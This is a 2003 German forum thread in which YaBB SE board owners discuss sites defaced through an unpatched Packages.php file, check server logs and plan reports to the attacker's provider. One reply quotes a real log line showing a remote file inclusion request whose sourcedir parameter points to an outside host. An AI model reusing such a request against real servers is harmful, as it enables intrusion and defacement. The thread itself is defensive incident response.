|
|
chris
Guest
|
 |
Re:Security fix für Board-Versionen < 1.5.1
« Reply #16 on: February 04, 2003, 09:54:16 PM » |
|
Quote from: MC600 on February 04, 2003, 09:49:22 PM@Christian Land
Ist das heute hier bei der Umstellung vergessen worden oder gibts da noch eine anderes Loch? Ein File (clevererweise Packages.php) wurde vergessen auf 1.5.1 RC hochzuziehen.... Die Quittung dafür hat man ja heute morgen hier sehen können.... |
|
|
|
|
Logged
|
|
|
|
|
|
don_miguel
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #18 on: February 13, 2003, 02:58:10 PM » |
|
Danke. Jetzt hat es uns auch erwischt!
Und alle Fixes waren drin!
|
|
|
|
|
Logged
|
|
|
|
chris
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #19 on: February 13, 2003, 03:38:31 PM » |
|
Quote from: don_miguel on February 13, 2003, 02:58:10 PM
Danke. Jetzt hat es uns auch erwischt!
Und alle Fixes waren drin!
Falls möglich, bitte das Apache-Log des betreffenden Zeitraumes (falls der eingrenzbar ist) irgendwo ablegen, damit wir checken können wie die reingekommen sind! Achja... was haben die denn genau gemacht? index.php ausgetauscht? |
|
|
|
« Last Edit: February 13, 2003, 03:39:44 PM by Christian Land »
|
Logged
|
|
|
|
don_miguel
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #20 on: February 13, 2003, 08:20:35 PM » |
|
Nach den Log Files guck ich.
Ja, die index.php wurde getauscht.
Das war hoffentlich alles...
Soll ich jetzt noch was fixen?
|
|
|
|
|
Logged
|
|
|
|
chris
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #21 on: February 13, 2003, 09:37:14 PM » |
|
Hast Du die Änderung in der Packages.php gemacht?
Such mal in Deinen Logs nach nem Aufruf der Packages.php mit dem Parameter sourcedir=irgendwas
Ich würde fast zu 99,999% drauf wetten das es daher kam....
|
|
|
|
|
Logged
|
|
|
|
|
|
don_miguel
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #23 on: February 14, 2003, 07:36:34 AM » |
|
Ich habe mich gerade an meinen Hoster gewandt. Ich hoffe der kann mir (uns) weiterhelfen da ich mit den Logfiles so nix anfangen könnte (und weil ich grad net viel Zeit habe). Passwörter werden geändert, die Packages.php werde ich nochmal prüfen... Hier ein Bild wie das ganze aussah:  |
|
|
|
|
Logged
|
|
|
|
don_miguel
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #24 on: February 14, 2003, 07:47:52 AM » |
|
Ok ich habe gerade festgestellt, das die packages.php nicht angepasst war, wobei ich nicht verstehe wieso ...  vor allem weil die alte "packages.php" als "packages_.php" noch auf dem server lag ... *konfus* ist es möglich das diese datei auch ausgetauscht wurde??? |
|
|
|
|
Logged
|
|
|
|
chris
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #25 on: February 14, 2003, 09:36:11 AM » |
|
Quote from: don_miguel on February 14, 2003, 07:47:52 AM
vor allem weil die alte "packages.php" als "packages_.php" noch auf dem server lag ... *konfus*
ist es möglich das diese datei auch ausgetauscht wurde??? möglich wäre es prinzipiell... allerdings ist mir nur ein weg bekannt bei yabb se files zu manipulieren und das wäre die packages.php.... wenn die entsprechend geändert wurde kann normalerweise nichts mehr passieren.... es sei denn jemand hat admin-rechte ünd würde über den package-manager was einspielen.... da wäre es ggf. hilfreich mal im Click-Log zu checken ob jemand von aussen die Profiles umgefummelt hat... Das könntest Du eventuell mit folgendem SQL-Statement rausfinden: SELECT * FROM yabbse_log_clicks WHERE (toUrl LIKE '%profile2%') AND (fromUrl NOT LIKE '%domainname%')ich konnte das leider noch nicht so testen :-/ bei domainname trägst Du Deinen Domainnamen ein (den teil zwischen www. und der tld .... hier wäre das also yabbse) |
|
|
|
|
Logged
|
|
|
|
don_miguel
Guest
|
 |
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #26 on: February 14, 2003, 11:49:47 AM » |
|
Die SQL Abfrage hat bei mir keine Ergebnisse gebracht. Mein Hoster hat mir aber gerade folgendes geschrieben: Quote
Der einzige Zugriff (aus Brasilien) auf die Datei Packages.php den ich
in den log-files gefunden habe lautet: logs/friends-lounge.de-2003-02-14:200.180.112.66 - -
[13/Feb/2003:14:08:10 +0100] "GET /Sources/Packages.php? sourcedir=http://www.dpalone.hpg.ig.com.br HTTP/1.0" 200 175 "- " "Mozilla/5.0 (X11; U; Linux 2.4.4 i686) Gecko/200"
Das wird es dann wohl gewesen sein ... also doch mein Fehler, wobei ich das nicht verstehe... Soll man dagegen jetzt irgendwie vorgehen oder bringen Euch allein die obigen Daten schon etwas? Gruss und Danke für die Hilfe! Miguel |
|
|
|
|
Logged
|
|
|
|
chris
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #27 on: February 14, 2003, 11:57:49 AM » |
|
Was Du machen könntest wäre ne Mail an [email protected] und [email protected] zu schreiben und darauf hinweisen das von dpalone.hpg.ig.com.br aus Dein Forum gehackt wurde, bzw. Dateien zerstört wurden... Dazu müsstest Du halt angeben das da eine Datei Packer.php rumfliegt die dazu benutzt wurde eine Sicherheitslücke bei Dir auszunutzen und dazu ggf. dann Deine IP und den Log-Eintrag anhängen... Anzeigen oder so lohnt sich nicht weil es eh ein Ausländer ist, etc. Ansonsten kannst Du ihn auch hier beschimpfen : http://web.icq.com/wwp?Uin=97700675  Falls er es wirklich war und nicht nur seine Seite dazu benutzt wurde... |
|
|
|
« Last Edit: February 14, 2003, 12:01:20 PM by Christian Land »
|
Logged
|
|
|
|
|
|
chris
Guest
|
|
Re:!!! SECURITY-FIXES für YaBB Versionen < 1.5.1
« Reply #29 on: February 24, 2003, 12:08:08 PM » |
|
Quote from: denoe on February 24, 2003, 11:50:15 AM
Mist, warum stosse ich erst heute darauf. Gestern haben sie meine 1.4.1 unter Ausnutzung des exploits gehackt. Nun ist es gefixt. Wieso werden bei solchen kritischen Sachen eigentlich keine Mails an die User des Forums herausgeschickt. argl....
durch einen kleinen fehler ging das security-announcement sogar ca. 10 mal an alle user raus.... *nur mal so anmerk* |
|
|
|
|
Logged
|
|
|
|
Author